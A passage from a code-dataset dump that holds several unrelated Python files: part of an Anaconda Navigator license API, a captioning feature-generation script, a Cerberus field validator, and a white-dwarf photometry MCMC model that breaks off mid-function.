\"\"\"Remove license callback.\"\"\"\n path = lic.get(LICENSE_PATH)\n sig = lic.get('sig')\n\n with open(path) as f:\n licenses = json.load(f)\n\n for i, lic in enumerate(licenses):\n if lic.get('sig') == sig:\n break\n\n removed_license = licenses.pop(i)\n with open(path, 'w') as f:\n json.dump(licenses, f)\n\n head, tail = os.path.split(os.path.abspath(path))\n removed_folder = os.path.join(head, REMOVED_LICENSE_PATH)\n removed_path = os.path.join(removed_folder, tail)\n\n if not os.path.isdir(removed_folder):\n os.mkdir(removed_folder)\n\n removed_licenses = [removed_license]\n if os.path.isfile(removed_path):\n # Merge removed files\n with open(removed_path) as f:\n existing_removed_licenses = json.load(f)\n removed_licenses.extend(existing_removed_licenses)\n\n with open(removed_path, 'w') as f:\n json.dump(removed_licenses, f)\n\n @classmethod\n def load_licenses(cls, product=None):\n \"\"\"Load license files.\"\"\"\n res = []\n # This is used instead of _license.find_licenses to have the path\n # for each file\n for license_path in cls.license_paths():\n licenses = _license.read_licenses(license_path)\n for lic in licenses:\n product_name = lic.get('product')\n product_filter = product == product_name if product else True\n if product_name in VALID_PRODUCT_LICENSES and product_filter:\n valid = cls.is_valid_license(lic)\n lic['__valid__'] = valid\n lic['__status__'] = 'Valid' if valid else 'Invalid'\n lic['__type__'] = lic.get('type', 'Enterprise').lower()\n lic[LICENSE_PATH] = license_path\n res.append(lic)\n return res\n\n @classmethod\n def get_package_license(cls, package_name):\n \"\"\"\n Get stored license for a package.\n\n If several license found only the valid ones with the largest date\n is returned. Priority is given to nontrial over trial licenses, even\n if a trial has a larger date.\n \"\"\"\n all_licenses = []\n for name in LICENSE_NAME_FOR_PACKAGE.get(package_name, []):\n licenses = cls.load_licenses(product=name)\n valid_licenses = [l for l in licenses if cls.is_valid_license(l)]\n all_licenses.extend(valid_licenses)\n\n # Order by trial and non trial. And select the one with the\n # longest remaining days giving priority to non trial.\n trial_valid_licenses = []\n nontrial_valid_licenses = []\n\n for lic in all_licenses:\n if cls.is_trial_license(lic):\n trial_valid_licenses.append(lic)\n else:\n nontrial_valid_licenses.append(lic)\n\n trial_valid_licenses = sorted(\n trial_valid_licenses,\n key=lambda i: i.get('end_date'),\n )\n nontrial_valid_licenses = sorted(\n nontrial_valid_licenses,\n key=lambda i: i.get('end_date'),\n )\n\n if nontrial_valid_licenses:\n lic = nontrial_valid_licenses[-1] # Larger date\n elif trial_valid_licenses:\n lic = trial_valid_licenses[-1] # Larger date\n else:\n lic = {}\n\n return lic\n\n @staticmethod\n def license_paths():\n \"\"\"Return licenses paths founds on main location.\"\"\"\n _license.get_license_paths()\n return _license.get_license_paths()\n\n @staticmethod\n def license_location():\n \"\"\"Return license main location.\"\"\"\n return _license.get_license_dirs()[0]\n\n @classmethod\n def is_valid_license(cls, lic):\n \"\"\"Return wether a license dictionary is valid.\"\"\"\n verified = cls.is_verified_license(lic)\n expired = cls.is_expired_license(lic)\n valid_vendor = cls.is_valid_vendor(lic)\n return verified and not expired and valid_vendor\n\n @staticmethod\n def is_verified_license(lic):\n \"\"\"Check that the license is verified.\"\"\"\n # Clean license from additional keys\n check_license = copy.deepcopy(lic)\n\n for key in lic:\n if key.startswith('__') and key.endswith('__'):\n check_license.pop(key)\n\n return bool(_license.verify_license(check_license))\n\n @staticmethod\n def is_valid_vendor(lic):\n \"\"\"Check if a license is from a valid vendor.\"\"\"\n vendor = lic[\"vendor\"]\n return vendor in (\n \"Continuum Analytics, Inc.\",\n \"Continuum Analytics\",\n \"continuum\",\n )\n\n @classmethod\n def is_expired_license(cls, lic):\n \"\"\"Check if the license is expired.\"\"\"\n return cls.get_days_left(lic) == 0\n\n @staticmethod\n def is_trial_license(lic):\n \"\"\"Check if a license is of trial type.\"\"\"\n return lic.get('type').lower() == 'trial'\n\n @classmethod\n def is_enterprise_license(cls, lic):\n \"\"\"Check if a license is of enterprise type.\"\"\"\n return not cls.is_trial_license(lic)\n\n @staticmethod\n def get_days_left(lic):\n \"\"\"Get the number of days left for a license.\"\"\"\n days = 0\n\n try:\n end_date = _license.date_from_string(lic.get(\"end_date\", ''))\n days = (end_date - datetime.date.today()).days\n if days < 0:\n days = 0\n except (ValueError, TypeError):\n days = 0\n\n if \"end_date\" not in lic:\n days = float(\"inf\")\n\n return days\n\n\nANACONDA_API = None\n\n\ndef AnacondaAPI():\n \"\"\"Manager API threaded worker.\"\"\"\n global ANACONDA_API\n\n if ANACONDA_API is None:\n ANACONDA_API = _AnacondaAPI()\n\n return ANACONDA_API\n\n\n# --- Local testing\n# -----------------------------------------------------------------------------\ndef finished(worker, output, error): # pragma: no cover\n \"\"\"Print information on test finished.\"\"\"\n print(worker, output, error)\n\n\ndef download_finished(url, path): # pragma: no cover\n \"\"\"Print information on downlaod finished.\"\"\"\n print(url, path)\n\n\ndef repodata_updated(repos): # pragma: no cover\n \"\"\"Print information on repodata updated.\"\"\"\n print(repos)\n\n\ndef test(): # pragma: no cover\n \"\"\"Main local test.\"\"\"\n from anaconda_navigator.utils.qthelpers import qapplication\n\n app = qapplication()\n api = AnacondaAPI()\n # api.sig_repodata_updated.connect(repodata_updated)\n # data_directory = tempfile.mkdtemp()\n # api.set_data_directory(data_directory)\n # worker = api.update_metadata()\n # worker.sig_download_finished.connect(download_finished)\n # api.update_repodata()\n lic = api.get_package_license('anaconda-fusion')\n print(lic)\n app.exec_()\n\n\nif __name__ == '__main__': # pragma: no cover\n test()\n","sub_path":"anaconda/anaconda/lib/python2.7/site-packages/anaconda_navigator/api/anaconda_api.py","file_name":"anaconda_api.py","file_ext":"py","file_size_in_byte":26943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134877425","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# ==============================================================================\n# \\file gen-attention-feature.py\n# \\author chenghuige \n# \\date 2017-12-02 20:08:52.122757\n# \\Description \n# ==============================================================================\n\n \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys, os\nimport glob \nimport numpy as np\nimport cPickle as pickle\nimport gezi\nimport math\n\nfrom deepiu.util import idf\n\nimport tensorflow as tf\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('input_file', 'ensemble.train.detect.scene.lm.attention.txt', '')\nflags.DEFINE_string('type', 'valid', 'valid or test')\nflags.DEFINE_string('img_dir', '/home/gezi/data2/data/ai_challenger/image_caption/pic/', '')\n\nprint('type', FLAGS.type)\nif FLAGS.type == 'test':\n FLAGS.input_file = './ensemble.inference.feature.detect.scene.lm.attention.txt'\nofile = FLAGS.input_file.replace('.txt', '.logprobs.txt')\nprint('infile:', FLAGS.input_file, 'ofile:',ofile, file=sys.stderr)\n\nlogprobs_files = glob.glob('./*model*.evaluate-inference.logprobs.txt') if FLAGS.type == 'valid' \\\n else glob.glob('./*model*.inference.logprobs.txt')\n\nassert len(logprobs_files) == 19\n\nnames = []\nnames += ['sum', 'min', 'max', 'mean']\nnames += ['idf_sum', 'idf_min', 'idf_max', 'idf_mean']\nnames += ['count_de', 'count_he']\nnames = ['logprobs_' + x for x in names]\n\nfrom deepiu.util import vocabulary\nvocabulary.init('/home/gezi/mount/temp/image-caption/ai-challenger/tfrecord/seq-basic/vocab.txt')\nvocab = vocabulary.vocab\n\nidf_weights = idf.get_idf()\n\nm = {}\ncount_map = {}\n\ndef deal_logprobs(file):\n for i, line in enumerate(open(file)):\n # if i == 0:\n # continue\n if i % 1000 == 0:\n print(i, end='\\r', file=sys.stderr)\n l = line.strip().split('\\t')\n img, caption = l[0], l[1]\n words = caption.split()\n words.append('
')\n caption = caption.replace(' ', '')\n logprobs = l[-1].split()\n logprobs = map(float, logprobs)\n # TODO FIXME whey some(small ratio) caption with -inf not as expected num_words + 1(end mark) ?\n logprobs = [x for x in logprobs if x > -1000]\n if len(logprobs) < len(words):\n words = words[:-1]\n logprobs = np.array(logprobs)\n if img not in m:\n m[img] = {}\n count_map[img] = {}\n if caption not in m[img]:\n m[img][caption] = np.array([0.] * len(names))\n count_map[img][caption] = 0\n fe = m[img][caption]\n count_map[img][caption] += 1\n\n fe[0] += logprobs.sum() \n fe[1] += logprobs.min()\n fe[2] += logprobs.max() \n fe[3] += logprobs.mean()\n\n idf_logprobs = []\n for i, word in enumerate(words):\n idf_logprobs.append(idf_weights[vocab.id(word)] * math.exp(logprobs[i]))\n idf_logprobs = np.array(idf_logprobs)\n fe[4] += idf_logprobs.sum()\n fe[5] += idf_logprobs.min()\n fe[6] += idf_logprobs.max()\n fe[7] += idf_logprobs.mean()\n\n fe[8] += words.count('的')\n fe[9] += words.count('和')\n \nfor i, file in enumerate(logprobs_files):\n timer = gezi.Timer('deal %d %s' % (i, file))\n deal_logprobs(file)\n timer.print()\n\nwith open(ofile, 'w') as out:\n timer = gezi.Timer('merge previous features')\n is_header = True\n default_fe = [0.] * len(names)\n for line in open(FLAGS.input_file):\n l = line.strip().split('\\t')\n if is_header:\n names = l + names \n print('\\t'.join(names), file=out)\n with open('./feature_name.txt', 'w') as out_fname:\n for name in names[3:]:\n print(name, file=out_fname)\n is_header = False\n continue\n img, caption = l[0], l[1]\n \n if caption in m[img]:\n fe = m[img][caption]\n fe = [x / count_map[img][caption] for x in fe]\n else:\n fe = default_fe\n l += map(str, fe)\n print('\\t'.join(l), file=out)\n timer.print()\n\n ","sub_path":"deepiu/tools/ai-challenger/gbdt/gen-logprobs-feature.py","file_name":"gen-logprobs-feature.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"28916103","text":"\nimport datetime\nimport re\n\nfrom cerberus import Validator\n\nfrom .land_net_templates import land_net_ref\n\n\nclass SingleFieldValidator(Validator):\n def _validate_type_numeric(self, value):\n # check for numeric value\n try:\n float(value)\n except ValueError:\n return False\n\n return True\n\n def _validate_type_positive_numeric(self, value):\n # check for positive numeric value\n try:\n test_num = float(value)\n except ValueError:\n return False\n\n if test_num < 0:\n return False\n else:\n return True\n\n def _validate_valid_precision(self, valid_precision, field, value):\n \"\"\"\n # Check that precision is no more than 2 decimal places\n\n The rule's arguments are validated against this schema:\n {'valid_precision': False}\n \"\"\"\n error_message = \"Invalid Value, decimal precision error\"\n\n stripped_value = value.strip()\n test_split = stripped_value.split(\".\", 1)\n # there is a decimal, so need to check what's after it\n if len(test_split) > 1:\n if test_split[1] == \"\":\n self._error(field, error_message)\n else:\n # Check that only digits 0-9 exist after the decimal\n test_field = re.search('[^0-9]+', test_split[1])\n if test_field is not None:\n # There is something besides digits 0-9 after the decimal\n self._error(field, error_message)\n if len(test_split[1]) > 2:\n self._error(field, error_message)\n\n def _validate_is_empty(self, is_empty, field, value):\n \"\"\"\n # Since the value coming in could consist of spaces, check that a value of only spaces is considered null\n\n The rule's arguments are validated against this schema:\n {'valid_is_empty': False}\n \"\"\"\n stripped_value = value.strip()\n if not is_empty:\n if not stripped_value:\n self._error(field, \"Field must contain non whitespace characters\")\n\n def _validate_valid_special_chars(self, valid_special_chars, field, value):\n \"\"\"\n # Check that tab, #, *, \\, \", ^, _, and $ do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_special_chars': True}\n \"\"\"\n if valid_special_chars:\n test_field = re.search(r'[\\t#*\\\\\\\"^_$]+', value)\n if test_field is not None:\n self._error(field, \"Invalid Character: contains tab, #, *, \\, \"\", ^, _, or $\")\n\n def _validate_valid_map_scale_chars(self, valid_map_scale_chars, field, value):\n \"\"\"\n # Check that characters other than 0-9 or a blank space do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_map_scale_chars': True}\n \"\"\"\n if valid_map_scale_chars:\n test_field = re.search('[^0-9 ]+', value)\n if test_field is not None:\n # There is something besides digits 0-9 or space\n self._error(field, \"Invalid Character: contains a character other than 0-9\")\n\n def _validate_valid_instruments_chars(self, valid_instruments_chars, field, value):\n \"\"\"\n # Check that characters other than Y, N, or a blank space do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_instruments_chars': True}\n \"\"\"\n if valid_instruments_chars:\n if not all(c.upper() in \"YN \" for c in value):\n self._error(field, \"Invalid Character: contains a character other than Y, N, or a blank space\")\n\n def _validate_valid_data_types_chars(self, valid_data_types_chars, field, value):\n \"\"\"\n # Check that character other than A, I, O, N, or a blank space do not exist in field\n\n The rule's arguments are validated against this schema:\n {'valid_data_types_chars': True}\n \"\"\"\n if valid_data_types_chars:\n if not all(c.upper() in \"AION \" for c in value):\n self._error(field, \"Invalid Character: contains a character other than A, I, O, N, or a blank space\")\n\n def _validate_valid_latitude_dms(self, valid_latitude_dms, field, value):\n # Check that field consists of valid degrees, minutes and second values\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_latitude_dms': True}\n \"\"\"\n error_message = \"Invalid Degree/Minute/Second Value\"\n rstripped_value = value.rstrip()\n\n def check_100th_seconds(val):\n try:\n val[7] in [\".\"]\n test_split = val.split(\".\")\n # There is a decimal, but have to check if anything was split from it\n if test_split[1] == \"\":\n return False\n else:\n # Check that only digits 0-9 exist after the decimal\n test_field = re.search('[^0-9]+', test_split[1])\n if test_field is None:\n # There are only digits 0-9 after the decimal\n return True\n else:\n # There is something besides digits 0-9 after the decimal\n return False\n except IndexError:\n return True\n\n if valid_latitude_dms and rstripped_value:\n first_val = rstripped_value[0]\n check_degrees = rstripped_value[1:3]\n check_minutes = rstripped_value[3:5]\n check_seconds = rstripped_value[5:7]\n\n try:\n if not ((first_val in \"- \") and (0 <= int(check_degrees) <= 90) and (\n 0 <= int(check_minutes) < 60) and (0 <= int(check_seconds) < 60)\n and check_100th_seconds(rstripped_value)):\n self._error(field, error_message)\n except ValueError:\n return self._error(field, error_message)\n\n def _validate_valid_longitude_dms(self, valid_longitude_dms, field, value):\n # Check that field consists of valid degrees, minutes and second values\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_longitude_dms': True}\n \"\"\"\n error_message = \"Invalid Degree/Minute/Second Value\"\n rstripped_value = value.rstrip()\n\n def check_100th_seconds(val):\n try:\n val[8] in [\".\"]\n test_split = val.split(\".\")\n # There is a decimal, but have to check if anything was split from it\n if test_split[1] == \"\":\n return False\n else:\n # Check that only digits 0-9 exist after the decimal\n test_field = re.search('[^0-9]+', test_split[1])\n if test_field is None:\n # There are only digits 0-9 after the decimal\n return True\n else:\n # There is something besides digits 0-9 after the decimal\n return False\n except IndexError:\n return True\n\n if valid_longitude_dms and rstripped_value:\n first_val = rstripped_value[0]\n check_degrees = rstripped_value[1:4]\n check_minutes = rstripped_value[4:6]\n check_seconds = rstripped_value[6:8]\n try:\n if not ((first_val in \"- \") and (0 <= int(check_degrees) <= 180) and (\n 0 <= int(check_minutes) < 60) and (0 <= int(check_seconds) < 60)\n and check_100th_seconds(rstripped_value)):\n self._error(field, error_message)\n except ValueError:\n return self._error(field, error_message)\n\n def _validate_valid_date(self, valid_date, field, value):\n # Check that field is a formatted date of YYYY, YYYYMM or YYYYMMDD\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_date': True}\n \"\"\"\n error_message = \"Invalid Date, should be YYYY, YYYYMM or YYYYMMDD\"\n stripped_value = value.strip()\n if valid_date:\n # Check for valid full or partial date lengths\n if len(stripped_value) in [8, 6, 4]:\n # Check that only digits 0-9 exist in the string\n test_field = re.search('[^0-9]+', stripped_value)\n if test_field is None:\n # There are only digits 0-9 in the string\n check_year = stripped_value[0:4]\n check_month = stripped_value[4:6]\n if not 1582 <= int(check_year) <= int(datetime.date.today().year):\n self._error(field, error_message)\n if len(stripped_value) == 8:\n try:\n valid_date = datetime.datetime.strptime(stripped_value, '%Y%m%d')\n except ValueError:\n return self._error(field, error_message)\n if check_month:\n if not 1 <= int(check_month) <= 12:\n self._error(field, error_message)\n\n else:\n self._error(field, error_message)\n else:\n self._error(field, error_message)\n\n def _validate_valid_land_net(self, valid_land_net, field, value):\n # Check that the land net description field follows the correct template\n\n \"\"\"\n The rule's arguments are validated against this schema:\n {'valid_land_net': True}\n \"\"\"\n error_message = \"Invalid format - Land Net does not fit template\"\n\n if valid_land_net:\n land_net_template = land_net_ref[\"55\"]\n value_end = len(value) - 1\n section = land_net_template.index(\"S\")\n township = land_net_template.index(\"T\")\n range = land_net_template.index(\"R\")\n try:\n if not (value[section] == \"S\" and value[township] == \"T\" and value[range] == \"R\"):\n return self._error(field, error_message)\n test_match = re.search('[^a-zA-Z0-9 ]', value[section:value_end])\n if test_match is not None:\n return self._error(field, error_message)\n except IndexError:\n return self._error(field, error_message)\n","sub_path":"mlrvalidator/validators/single_field_validator.py","file_name":"single_field_validator.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"408397685","text":"import multiprocessing as mp\nimport os\nfrom enum import Enum\nimport copy\n\nimport configobj\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport emcee\nimport scipy.interpolate as interp\nfrom astropy.stats import sigma_clipped_stats\n\nfrom utils import read_chain\nfrom mcmc_utils import (\n flatchain,\n initialise_walkers,\n run_burnin,\n run_mcmc_save,\n thumbPlot,\n)\nfrom model import Param\n\n# import warnings\n\n\n# Location of data tables\nROOT, _ = os.path.split(__file__)\n\n\ndef ln_prior(vect, model):\n # first we update the model to use the pars suggested by the MCMC chain\n for i in range(model.npars):\n model[i] = vect[i]\n\n lnp = 0.0\n\n # teff, (usually uniform between allowed range - 6 to 90,000)\n param = model.teff\n lnp += param.prior.ln_prob(param.currVal)\n\n # logg, uniform between allowed range (7.01 to 8.99), or Gaussian from constraints\n param = model.logg\n lnp += param.prior.ln_prob(param.currVal)\n\n # Parallax, gaussian prior of the gaia value.\n param = model.plax\n lnp += param.prior.ln_prob(param.currVal)\n\n # enforce +ve parallax\n if model.plax.currVal <= 0:\n return -np.inf\n\n # reddening, cannot exceed galactic value (should estimate from line of sight)\n # https://irsa.ipac.caltech.edu/applications/DUST/\n param = model.ebv\n lnp += param.prior.ln_prob(param.currVal)\n return lnp\n\n\ndef ln_likelihood(vect, model):\n # first we update the model to use the pars suggested by the MCMC chain\n for i in range(model.npars):\n model[i] = vect[i]\n return -0.5 * model.chisq()\n\n\ndef ln_prob(vect, model):\n lnp = ln_prior(vect, model)\n if np.isfinite(lnp):\n lnp += ln_likelihood(vect, model)\n if np.isnan(lnp):\n lnp = -np.inf\n return lnp\n\n\ndef sdss2kg5(g, r):\n KG5 = g - 0.2240 * (g - r) ** 2 - 0.3590 * (g - r) + 0.0460\n return KG5\n\n\nsdss2kg5_vect = np.vectorize(sdss2kg5)\n\n\ndef sdssmag2flux(mag):\n return 3631e3 * np.power(10, -0.4 * mag)\n\n\nclass PhotometricSystem(Enum):\n SDSS = \"SDSS\"\n HCAM = \"HCAM\"\n UCAM_SDSS = \"UCAM_SDSS\"\n UCAM_SUPER = \"UCAM_SUPER\"\n USPEC = \"USPEC\"\n\n @property\n def bergeron_table(self):\n \"\"\"\n Name of correct table for Bergeron mags\n \"\"\"\n if self.name == \"SDSS\":\n return os.path.join(ROOT, \"Bergeron/Table_DA_sdss\")\n else:\n return os.path.join(ROOT, \"Bergeron/Table_DA\")\n\n def color_correction_data(self, band):\n \"\"\"\n Information needed for correction from Bergeron table to this band\n\n Parameters\n ----------\n band: str\n e.g u, g, r, i, z\n\n Returns\n -------\n table: str\n Path to color correction tables\n column: str\n Name of column to read from table for correction\n \"\"\"\n if self.name == \"USPEC\":\n table = os.path.join(\n ROOT,\n \"Bergeron/color_correction_tables/color_corrections_HCAM-GTC-super_minus_tnt_uspec.csv\",\n )\n column = band\n elif self.name == \"SDSS\" or self.name == \"HCAM\":\n table = None\n column = None\n else:\n table = os.path.join(\n ROOT,\n \"Bergeron/color_correction_tables/color_corrections_HCAM-GTC-super_minus_ntt_ucam.csv\",\n )\n column = f\"{band}_s\" if \"SUPER\" in self.name else band\n return table, column\n\n def central_wavelength(self, band):\n super_lambda_c = {\n \"u\": 352.6,\n \"g\": 473.2,\n \"r\": 619.9,\n \"i\": 771.1,\n \"z\": 915.6,\n }\n lambda_c = {\n \"u\": 355.7,\n \"g\": 482.5,\n \"r\": 626.1,\n \"i\": 767.2,\n \"z\": 909.7,\n \"kg5\": 507.5,\n }\n lambda_c_dict = (\n super_lambda_c if self.name in [\"HCAM\", \"UCAM_SUPER\"] else lambda_c\n )\n return lambda_c_dict[band]\n\n\nclass Flux(object):\n BANDS = [\"u\", \"g\", \"r\", \"i\", \"z\"]\n # Multiply E(B-V) by these numbers to get extinction in each band\n # from Schlafly & Finkbeiner (2011) @ R_V = 3.1\n EXTINCTION_COEFFS = {\n \"u\": 4.239,\n \"g\": 3.303,\n \"r\": 2.285,\n \"i\": 1.698,\n \"z\": 1.263,\n \"kg5\": 2.751,\n }\n\n def __init__(self, val, err, photometric_system, band, syserr=0.03):\n \"\"\"\n Representation of an observed WD flux\n\n Parameters\n ----------\n val, err: float\n Observed value and error\n photometric_system: PhotometricSystem\n The system this flux is observed in e.g SDSS or HCAM\n band: str\n Name of filter, e.g 'u', 'g' etc.\n\n Do not use values like 'g_s' here, that is taken\n care of in the photometric system\n syserr: float\n Additional systematic error added to account for calibration\n issues.\n \"\"\"\n self.flux = val\n self.err = np.sqrt(err**2 + (val * syserr) ** 2)\n\n # This is the actual band observed with.\n self.photometric_system = photometric_system\n self.band = band\n self.mag = 2.5 * np.log10(3631e3 / self.flux)\n self.magerr = 2.5 * 0.434 * (self.err / self.flux)\n\n # Create an interpolater for the color corrections\n correction_table_name, column = photometric_system.color_correction_data(\n self.band\n )\n if correction_table_name is not None:\n correction_table = pd.read_csv(correction_table_name)\n self.correction_func = interp.LinearNDInterpolator(\n correction_table[[\"Teff\", \"logg\"]], correction_table[column]\n )\n else:\n self.correction_func = None\n\n # Create an interpolator for the Bergeron table\n DA = pd.read_csv(\n photometric_system.bergeron_table,\n delim_whitespace=True,\n skiprows=0,\n header=1,\n )\n self.bergeron_func = interp.LinearNDInterpolator(\n DA[[\"Teff\", \"log_g\"]], DA[band]\n )\n\n def __repr__(self):\n return \"Flux(val={:.3f}, err={:.3f}, photometric_system={}, band={})\".format(\n self.flux, self.err, self.photometric_system, self.band\n )\n\n @property\n def extinction_coefficient(self):\n return self.EXTINCTION_COEFFS[self.band]\n\n @property\n def central_wavelength(self):\n return self.photometric_system.central_wavelength(self.band)\n\n\nclass WDModel:\n \"\"\"\n Model for calculating WD Fluxes\n\n Can be passed to MCMC routines for calculating model and chisq, and prior prob\n\n This class also behaves like a list, of the current values of all parameters\n this enables it to be seamlessly used with emcee\n\n Note that parallax should be provided in MILLIarcseconds.\n\n Parameters\n -----------\n teff, logg, plax, ebv: `mcmc_utils.Param`\n Fittable parameters.\n fluxes: list(Flux)\n A list of observed fluxes.\n \"\"\"\n\n # arguments are Param objects (see mcmc_utils)\n def __init__(self, teff, logg, plax, ebv, fluxes):\n self.teff = teff\n self.logg = logg\n self.plax = plax\n self.ebv = ebv\n\n # initialise list bit of object with parameters\n self.variables = [self.teff, self.logg, self.plax, self.ebv]\n\n # Observed data\n self.obs_fluxes = copy.copy(fluxes)\n\n # these routines are needed so object will behave like a list\n def __getitem__(self, ind):\n return self.variables[ind].currVal\n\n def __setitem__(self, ind, val):\n self.variables[ind].currVal = val\n\n def __delitem__(self, ind):\n self.variables.remove(ind)\n\n def __len__(self):\n return len(self.variables)\n\n def insert(self, ind, val):\n self.variables.insert(ind, val)\n\n @property\n def npars(self):\n return len(self.variables)\n\n @property\n def dist(self):\n if self.plax.currVal <= 0.0:\n return np.inf\n else:\n return 1000.0 / self.plax.currVal\n\n def __repr__(self):\n return \"WDModel(teff={:.1f}, logg={:.2f}, plax={:.3f}, ebv={:.1f})\".format(\n self.teff.currVal,\n self.logg.currVal,\n self.plax.currVal,\n self.ebv.currVal,\n )\n\n @property\n def apparent_mags(self):\n \"\"\"\n Calculate apparent magnitudes for each of my observed fluxes\n \"\"\"\n mags = []\n t, g = self.teff.currVal, self.logg.currVal\n # Distance modulus\n dmod = -5.0 * np.log10(self.plax.currVal / 100)\n for flux in self.obs_fluxes:\n abs_mag = flux.bergeron_func(t, g)\n # correction from magnitude in bergeron table to observed system\n if flux.correction_func is None:\n correction = 0\n else:\n correction = flux.correction_func(t, g)\n # correction is Bergeron System - Observed System\n # correct to OBSERVED system\n abs_mag -= correction\n # apply distance modulus\n mag = abs_mag + dmod\n\n # apply exinction\n extinction = self.ebv.currVal * flux.extinction_coefficient\n mag += extinction\n mags.append(mag)\n\n return np.array(mags)\n\n def chisq(self):\n \"\"\"Calculate Chisq\"\"\"\n\n mags = self.apparent_mags\n predicted_fluxes = sdssmag2flux(mags)\n observed_fluxes = np.array([f.flux for f in self.obs_fluxes])\n errors = np.array([f.err for f in self.obs_fluxes])\n # Chi-squared\n chisq = np.power(((predicted_fluxes - observed_fluxes) / errors), 2)\n chisq = np.sum(chisq)\n\n return chisq\n\n\ndef plotColors(model, fname=\"colorplot.pdf\"):\n print(\"\\n\\n-----------------------------------------------\")\n print(\"Creating color plots...\")\n _, ax = plt.subplots(figsize=(6, 6))\n\n # OBSERVED DATA\n flux_u = [obs for obs in model.obs_fluxes if \"u\" in obs.band][0]\n flux_g = [obs for obs in model.obs_fluxes if \"g\" in obs.band][0]\n flux_r = [obs for obs in model.obs_fluxes if \"r\" in obs.band][0]\n print(\"Observations:\\n {}\\n {}\\n {}\".format(flux_u, flux_g, flux_r))\n\n obs_ug_err = np.sqrt((flux_u.magerr**2) + (flux_g.magerr**2))\n obs_gr_err = np.sqrt((flux_g.magerr**2) + (flux_r.magerr**2))\n\n # Correct magnitudes to the Bergeron frame\n t, g = model.teff.currVal, model.logg.currVal\n u_mag = flux_u.bergeron_mag(t, g)\n g_mag = flux_g.bergeron_mag(t, g)\n r_mag = flux_r.bergeron_mag(t, g)\n\n if model.DEBUG:\n print(\"Observation, uncorrected for IS extinction:\")\n print(\n \" Magnitudes:\\n u: {}\\n g: {}\\n r: {}\".format(\n u_mag, g_mag, r_mag\n )\n )\n\n # subtract interstellar extinction\n ex = model.ebv\n u_mag -= model.extinction_coefficients[\"u_s\"] * ex.currVal\n g_mag -= model.extinction_coefficients[\"g_s\"] * ex.currVal\n r_mag -= model.extinction_coefficients[\"r_s\"] * ex.currVal\n\n print(\"After correcting (if necessary), and removing IS extinction:\")\n print(\n \" Magnitudes:\\n u: {}\\n g: {}\\n r: {}\".format(u_mag, g_mag, r_mag)\n )\n\n ug_mag = u_mag - g_mag\n gr_mag = g_mag - r_mag\n\n print(\n \"Observed Colors in the HCAM/GTC/super lightpath (corrected for IS extinction):\"\n )\n print(\"u-g = {:> 5.3f}+/-{:< 5.3f}\".format(ug_mag, obs_ug_err))\n print(\"g-r = {:> 5.3f}+/-{:< 5.3f}\".format(gr_mag, obs_gr_err))\n\n # Generate the model's apparent magnitudes (no atmosphere, no IS extinction), and plot that color too\n # Get absolute magnitudes\n abs_mags = model.gen_absolute_mags()\n # Apply distance modulus\n dmod = 5.0 * np.log10(model.dist / 10.0)\n modelled_mags = abs_mags + dmod\n\n # Calculate the colours\n bands = [obs.orig_band for obs in model.obs_fluxes]\n u_index = bands.index(flux_u.orig_band)\n g_index = bands.index(flux_g.orig_band)\n r_index = bands.index(flux_r.orig_band)\n if model.DEBUG:\n print(\n \"Bergeron model interpolations for T: {:.0f}, log(g): {:.3f}...\".format(\n model.teff.currVal, model.logg.currVal\n )\n )\n print(\"Observed bands: {}\".format(bands))\n print(\"Modelled mags: {}\".format(modelled_mags))\n print(\"Indexes|| u: {} || g: {} || r: {}\\n\".format(u_index, g_index, r_index))\n\n model_ug = modelled_mags[u_index] - modelled_mags[g_index]\n model_gr = modelled_mags[g_index] - modelled_mags[r_index]\n\n # bergeron model magnitudes, will be plotted as tracks\n bergeron_umags = np.array(model.DA[\"u_s\"])\n bergeron_gmags = np.array(model.DA[\"g_s\"])\n bergeron_rmags = np.array(model.DA[\"r_s\"])\n\n # calculate colours\n ug = bergeron_umags - bergeron_gmags\n gr = bergeron_gmags - bergeron_rmags\n\n # make grid of teff, logg from the bergeron table\n teffs = np.unique(model.DA[\"Teff\"])\n loggs = np.unique(model.DA[\"log_g\"])\n nteff = len(teffs)\n nlogg = len(loggs)\n # reshape colours onto 2D grid of (logg, teff)\n ug = ug.reshape((nlogg, nteff))\n gr = gr.reshape((nlogg, nteff))\n\n # Plotting\n # Bergeron cooling tracks and isogravity contours\n for a in range(nlogg):\n ax.plot(ug[a, :], gr[a, :], \"k-\")\n for a in range(0, nteff, 4):\n ax.plot(ug[:, a], gr[:, a], \"r--\")\n\n # Observed color\n ax.errorbar(\n x=ug_mag,\n y=gr_mag,\n xerr=obs_ug_err,\n yerr=obs_gr_err,\n fmt=\"o\",\n ls=\"none\",\n color=\"darkred\",\n capsize=3,\n label=\"Observed\",\n )\n\n # Modelled color\n ax.errorbar(\n x=model_ug,\n y=model_gr,\n fmt=\"o\",\n ls=\"none\",\n color=\"blue\",\n capsize=3,\n label=\"Modelled - T: {:.0f} | logg: {:.2f}\".format(t, g),\n )\n\n # annotate for teff\n xa = ug[0, 4] + 0.03\n ya = gr[0, 4]\n val = teffs[4]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"center\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n xa = ug[0, 8] + 0.03\n ya = gr[0, 8]\n val = teffs[8]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"center\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n xa = ug[0, 20] + 0.01\n ya = 